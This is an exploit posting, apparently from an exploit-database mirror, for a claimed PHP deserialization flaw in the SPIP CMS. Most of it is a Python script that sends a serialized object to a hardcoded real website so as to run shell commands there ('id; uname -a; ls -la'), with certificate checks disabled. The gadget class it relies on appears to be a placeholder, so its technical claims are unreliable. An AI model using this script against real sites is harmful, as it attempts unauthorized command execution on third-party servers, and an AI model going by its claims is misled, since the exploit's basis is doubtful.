Share
## https://sploitus.com/exploit?id=PACKETSTORM:216154
=============================================================================================================================================
    | # Title     : SPIP Gadget Chain before 4.4.9 Potential PHP Object Deserialization Vulnerability                                           |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
    | # Vendor    : https://www.spip.net/en_rubrique25.html                                                                                     |
    =============================================================================================================================================
    
    [+] Summary    :  This Python script is designed to send a crafted serialized PHP object to a target website in order to test for a potential PHP Object Deserialization vulnerability.
    
    It:
    
    Uses the requests library to send a GET request to a specified target URL.
    
    Generates a serialized PHP payload referencing a class named SPIP_Exploit_Gadget.
    
    Injects the payload into the var_data parameter.
    
    Attempts to trigger command execution (id; uname -a; ls -la) if a vulnerable gadget chain exists on the server.
    
    Disables SSL certificate verification warnings for testing purposes.
    
    Prints the HTTP response and checks if command output appears in the response body.
    
    [+] POC   : 
    
    import requests
    import urllib.parse
    import urllib3
    
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    
    target_url = "https://www.peyres.fr" 
    command_to_run = "id; uname -a; ls -la"
    
    def generate_payload(cmd):
        """
        Generate a PHP serialized payload.
        Note: Success depends on the existence of the 'SPIP_Exploit_Gadget' class 
        or an equivalent Gadget Chain within the server-side files.
        """
        payload = f'O:19:"SPIP_Exploit_Gadget":1:{{s:7:"command";s:{len(cmd)}:"{cmd}";}}'
        return payload
    
    def launch_exploit():
        payload = generate_payload(command_to_run)
        
        params = {
            'page': 'article',
            'id_article': '1',
            'var_data': payload  
        }
    
        print(f"[*] Sending payload to: {target_url}")
        print(f"[*] Target Command: {command_to_run}")
        
        try:
            response = requests.get(target_url, params=params, timeout=15, verify=False)
            
            print("-" * 30)
            print(f"[+] Response Status: {response.status_code}")
    
            if response.status_code == 200:
                print("[+] Potential output found in response body:")
                print(response.text[:1000]) # Print first 1000 characters for inspection
            else:
                print("[-] Server responded with an error.")
                
            print("-" * 30)
            
        except requests.exceptions.RequestException as e:
            print(f"[-] Connection Error: {e}")
    
    if __name__ == "__main__":
        launch_exploit()
    	
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================